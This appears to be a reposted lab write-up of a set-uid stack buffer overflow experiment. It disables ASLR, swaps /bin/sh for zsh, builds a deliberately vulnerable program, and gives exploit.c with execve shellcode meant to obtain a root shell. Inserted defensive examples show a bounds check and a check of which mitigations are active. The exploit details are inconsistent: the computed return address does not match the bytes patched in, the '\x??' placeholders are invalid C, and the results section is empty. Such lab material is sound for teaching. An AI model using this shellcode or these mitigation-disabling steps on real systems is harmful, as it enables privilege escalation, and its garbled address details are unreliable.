20165232 Buffer Overflow Vulnerability experiment

Source: Internet
Author: User

Experimental preparation of Buffer Overflow Vulnerability experiment

The lab environment requires a 32-bit Linux system and needs to download and install some packages for compiling 32-bit C programs, as follows:

$ sudo apt-get update
$ sudo apt-get install -y lib32z1 libc6-dev-i386
$ sudo apt-get install -y lib32readline-gplv2-dev

Initial setup of experimental content

1. Turn off address space layout randomization (ASLR) with the command:

$ sudo sysctl -w kernel.randomize_va_space=0

2. Replace /bin/sh with another shell program (zsh), since the default shell drops privileges when run set-uid. The commands are as follows:

$ sudo su
$ cd /bin
$ rm sh
$ ln -s zsh sh
$ exit

3. Enter /bin/bash to start a bash shell.

Shellcode

In general, a buffer overflow can cause a program to crash: the overflowing data overwrites the saved return address on the stack. If the bytes that overwrite the return address form another valid address, the program jumps to that address when the function returns; if that address holds a piece of carefully crafted code that performs some other function, that code is called shellcode.

Vulnerability procedures

1. Create a new stack.c file in the /tmp directory:

$ cd /tmp
$ vi stack.c

The code is as follows:

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem:
       str may hold up to 517 bytes, buffer holds 12 */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    /* Read up to 517 raw bytes from "badfile" (no NUL terminator is added) */
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

2. Compile the program (32-bit, executable stack, no stack protector) and set the set-uid bit so that it runs as root. The commands are as follows:

$ sudo su
$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
$ chmod u+s stack
$ exit
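As an added example (not part of the lab's stack.c): the same 12-byte buffer, but with a length check in place of strcpy(), so that a 517-byte badfile is rejected instead of overwriting the saved return address. The names bof_safe() and process_input() and the two constructed inputs are chosen here for illustration.

```c
/* Added example: a bounds-checked counterpart to bof() from stack.c.
 * Not part of the lab's code; bof_safe(), process_input() and demo()
 * are names chosen here. */
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define BUF_SIZE   12    /* same 12-byte buffer as bof() in stack.c */
#define INPUT_SIZE 517   /* same badfile read size as stack.c */

/* Returns 1 when the whole input fits (including the NUL terminator),
 * 0 when it is rejected because it would overflow buffer[].
 * Nothing is copied in the reject case, so the saved return address
 * can never be overwritten. */
int bof_safe(const char *str, size_t len)
{
    char buffer[BUF_SIZE];

    if (len >= sizeof(buffer)) {
        return 0;                 /* would need len + 1 bytes */
    }
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 1;
}

/* Mirrors the lab's read pattern: the input is a block of raw bytes that is
 * not necessarily NUL-terminated. strnlen() bounds the scan at n, so an
 * unterminated 517-byte block is measured, not read past. */
int process_input(const unsigned char *data, size_t n)
{
    if (n > INPUT_SIZE) {
        n = INPUT_SIZE;
    }
    size_t len = strnlen((const char *)data, n);
    return bof_safe((const char *)data, len);
}

/* Constructed inputs, not taken from a real badfile:
 * a 5-byte string that fits, and 517 bytes of 0x90 (a NOP-sled look-alike,
 * the same size the lab's exploit writes). Returns 1 if the short input is
 * accepted and the long one rejected. */
int demo(void)
{
    unsigned char short_input[] = "hello";
    unsigned char long_input[INPUT_SIZE];
    memset(long_input, 0x90, sizeof long_input);

    int ok_short = process_input(short_input, 5);
    int ok_long  = process_input(long_input, sizeof long_input);
    printf("short input accepted: %d, 517-byte input accepted: %d\n",
           ok_short, ok_long);
    return ok_short && !ok_long;
}
```

The point of the contrast: bof() trusts that str is shorter than its buffer, while bof_safe() is given the length and refuses anything of 12 bytes or more, so the 517-byte file the exploit section builds never reaches the copy. The same check should be applied in main() before bof() is ever called.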

Attack program

1. Create a new exploit.c file in the /tmp directory with the following code:

/* exploit.c */
/* A program that creates a file containing code for launching a shell */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0"          /* xorl  %eax,%eax        */
    "\x50"              /* pushl %eax             */
    "\x68""//sh"        /* pushl $0x68732f2f      */
    "\x68""/bin"        /* pushl $0x6e69622f      */
    "\x89\xe3"          /* movl  %esp,%ebx        */
    "\x50"              /* pushl %eax             */
    "\x53"              /* pushl %ebx             */
    "\x89\xe1"          /* movl  %esp,%ecx        */
    "\x99"              /* cdq                    */
    "\xb0\x0b"          /* movb  $0x0b,%al        */
    "\xcd\x80"          /* int   $0x80            */
;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here.
       The four \x?? bytes, starting at a specific offset in buffer, overwrite
       the return address with the shellcode address; they are filled in
       after the address is found with gdb in the next step. */
    strcpy(buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                   "\x??\x??\x??\x??");

    /* Copy the shellcode into buffer at offset 100 */
    strcpy(buffer + 100, shellcode);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}

2. To find the shellcode's address in memory, run the program under gdb and disassemble main:

$ gdb stack
$ disass main

3. Since the exploit places the shellcode with the statement strcpy(buffer + 100, shellcode); the shellcode's address is the buffer's start address plus 100: 0xffffd420 (hex) + 0x64 (100 in hex) = 0xffffd484 (hex).

Now modify the exploit.c file: change \x?? \x?? \x?? \x?? to \xc4\xd0\xff\xff.

Then compile the exploit.c program:

$ gcc -m32 -o exploit exploit.c

Attack results

Assignment

Use the command

sudo sysctl -w kernel.randomize_va_space=2

to turn the system's address space randomization back on, then run the exploit program repeatedly against the stack program and observe whether the attack still succeeds and root privileges can be obtained.
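Added example, not from the lab: a small C program that reports whether the two mitigations this lab switches off are currently off on the machine, by reading kernel.randomize_va_space from /proc/sys and checking the permission bits of its own [stack] mapping in /proc/self/maps. The function names are chosen here; the procfs paths are standard Linux. Compile it once with the lab's flags (gcc -m32 -z execstack) and once with gcc's defaults to see the stack permission flip, and run it before and after the sysctl above to see the ASLR level change.

```c
/* Added example (not part of the lab): report the state of the two
 * mitigations the lab disables. Function names are chosen here. */
#include <stdio.h>
#include <string.h>

/* Returns the value of kernel.randomize_va_space (0, 1 or 2), or -1 if the
 * file cannot be read (non-Linux system or restricted /proc). */
int read_aslr_level(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int level = -1;
    if (f == NULL) {
        return -1;
    }
    if (fscanf(f, "%d", &level) != 1) {
        level = -1;
    }
    fclose(f);
    return level;
}

/* Classifies one /proc/<pid>/maps line. Returns 1 for an executable [stack]
 * mapping (as produced by -z execstack), 0 for a [stack] mapping without the
 * x bit, -1 for any other line. Kept separate so it can be checked on
 * constructed lines without touching /proc. */
int classify_maps_line(const char *line)
{
    if (strstr(line, "[stack]") == NULL) {
        return -1;
    }
    /* Line format: "start-end perms offset dev inode path";
       perms is the second field, e.g. "rwxp" or "rw-p". */
    char perms[8] = {0};
    if (sscanf(line, "%*s %7s", perms) != 1) {
        return -1;
    }
    return perms[2] == 'x' ? 1 : 0;
}

/* Returns 1 if this process's own stack is executable, 0 if not,
 * -1 if /proc/self/maps is unavailable. */
int own_stack_is_executable(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    int result = -1;
    if (f == NULL) {
        return -1;
    }
    while (fgets(line, sizeof line, f) != NULL) {
        int c = classify_maps_line(line);
        if (c >= 0) {
            result = c;
            break;
        }
    }
    fclose(f);
    return result;
}

int main(void)
{
    int level  = read_aslr_level();
    int xstack = own_stack_is_executable();

    printf("kernel.randomize_va_space = %d (%s)\n", level,
           level == 0 ? "ASLR off, as the lab sets it" :
           level > 0  ? "ASLR on: stack addresses change between runs" :
                        "unknown");
    printf("own stack executable: %s\n",
           xstack == 1 ? "yes (-z execstack)" :
           xstack == 0 ? "no" : "unknown");
    return 0;
}
```

With randomize_va_space at 2 the stack base moves on every execution of ./stack, which is why a return address computed once in gdb (0xffffd484 in the step above) only matches by chance; with the value at 0 it is the same on every run, which is what made the single computed address reliable.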

